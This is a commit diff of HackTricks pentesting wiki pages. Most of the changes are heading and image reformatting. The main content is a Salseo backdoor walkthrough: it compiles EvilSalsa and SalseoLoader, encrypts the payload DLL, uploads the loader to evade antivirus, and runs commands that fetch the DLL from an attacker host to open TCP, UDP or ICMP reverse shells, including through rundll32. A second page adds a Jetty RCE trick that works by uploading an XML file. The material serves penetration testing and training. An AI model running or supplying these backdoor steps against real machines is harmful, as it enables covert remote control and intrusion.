GitBook: [#3350] No subject

backdoors/salseo.md

@@ -1,4 +1,4 @@
-
+# Salseo
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Compiling the binaries
+## Compiling the binaries
 
 Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
 
@@ -25,26 +24,26 @@ Compile those projects for the architecture of the windows box where your are go
 
 You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
 
-(**If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
+(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
 
 ![](../.gitbook/assets/image.png)
 
 Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
 
-![](<../.gitbook/assets/image (1).png>)
+![](<../.gitbook/assets/image (1) (2).png>)
 
-# Prepare the Backdoor
+## Prepare the Backdoor
 
 First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
 
-## **Python**
+### **Python**
 
 ```
 python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
 python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
 ```
 
-## Windows
+### Windows
 
 ```
 EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
@@ -55,9 +54,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco
 
 **Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
 
-# **Execute the backdoor**
+## **Execute the backdoor**
 
-## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
+### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
 
 Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
 
@@ -65,7 +64,7 @@ Remember to start a nc as the reverse shell listener and a HTTP server to serve
 SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
 ```
 
-## **Getting a UDP reverse shell (downloading encoded dll through SMB)**
+### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
 
 Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
 
@@ -73,11 +72,11 @@ Remember to start a nc as the reverse shell listener, and a SMB server to serve
 SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
 ```
 
-## **Getting a ICMP reverse shell (encoded dll already inside the victim)**
+### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
 
 **This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
 
-### **Disable ICMP Replies:**
+#### **Disable ICMP Replies:**
 
 ```
 sysctl -w net.ipv4.icmp_echo_ignore_all=1
@@ -86,45 +85,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
 sysctl -w net.ipv4.icmp_echo_ignore_all=0
 ```
 
-### Execute the client:
+#### Execute the client:
 
 ```
 python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
 ```
 
-### Inside the victim, lets execute the salseo thing:
+#### Inside the victim, lets execute the salseo thing:
 
 ```
 SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
 ```
 
-# Compiling SalseoLoader as DLL exporting main function
+## Compiling SalseoLoader as DLL exporting main function
 
 Open the SalseoLoader project using Visual Studio.
 
-## Add before the main function: \[DllExport]
+### Add before the main function: \[DllExport]
 
-![](<../.gitbook/assets/image (2).png>)
+![](<../.gitbook/assets/image (2) (1).png>)
 
-## Install DllExport for this project
+### Install DllExport for this project
 
-### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
+#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
 
 ![](<../.gitbook/assets/image (3).png>)
 
-### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
+#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
 
 ![](<../.gitbook/assets/image (4).png>)
 
 In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
 
-## **U**ninstall DllExport
+### **U**ninstall DllExport
 
 Press **Uninstall** (yeah, its weird but trust me, it is necessary)
 
 ![](<../.gitbook/assets/image (5).png>)
 
-## **Exit Visual Studio and execute DllExport\_configure**
+### **Exit Visual Studio and execute DllExport\_configure**
 
 Just **exit** Visual Studio
 
@@ -134,13 +133,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),
 
 ![](<../.gitbook/assets/image (7).png>)
 
-## **Open the project again with visual Studio**
+### **Open the project again with visual Studio**
 
 **\[DllExport]** should not be longer marked as error
 
 ![](<../.gitbook/assets/image (8).png>)
 
-## Build the solution
+### Build the solution
 
 Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
 
@@ -152,7 +151,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P
 
 To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
 
-## Test the generated Dll
+### Test the generated Dll
 
 Copy and paste the Dll where you want to test it.
 
@@ -164,11 +163,11 @@ rundll32.exe SalseoLoader.dll,main
 
 If no error appears, probably you have a functional DLL!!
 
-# Get a shell using the DLL
+## Get a shell using the DLL
 
 Don't forget to use a **HTTP** **server** and set a **nc** **listener**
 
-## Powershell
+### Powershell
 
 ```
 $env:pass="password"
@@ -179,7 +178,7 @@ $env:shell="reversetcp"
 rundll32.exe SalseoLoader.dll,main
 ```
 
-## CMD
+### CMD
 
 ```
 set pass=password
@@ -190,7 +189,6 @@ set shell=reversetcp
 rundll32.exe SalseoLoader.dll,main
 ```
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -206,5 +204,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

pentesting-web/file-upload/README.md

@@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+![](<../../.gitbook/assets/image (2).png>)
 
 **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
@@ -106,6 +106,12 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
 
 The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
 
+## **Jetty RCE**
+
+If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
+
+![](<../../.gitbook/assets/image (1).png>)
+
 ## **wget File Upload/SSRF Trick**
 
 In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\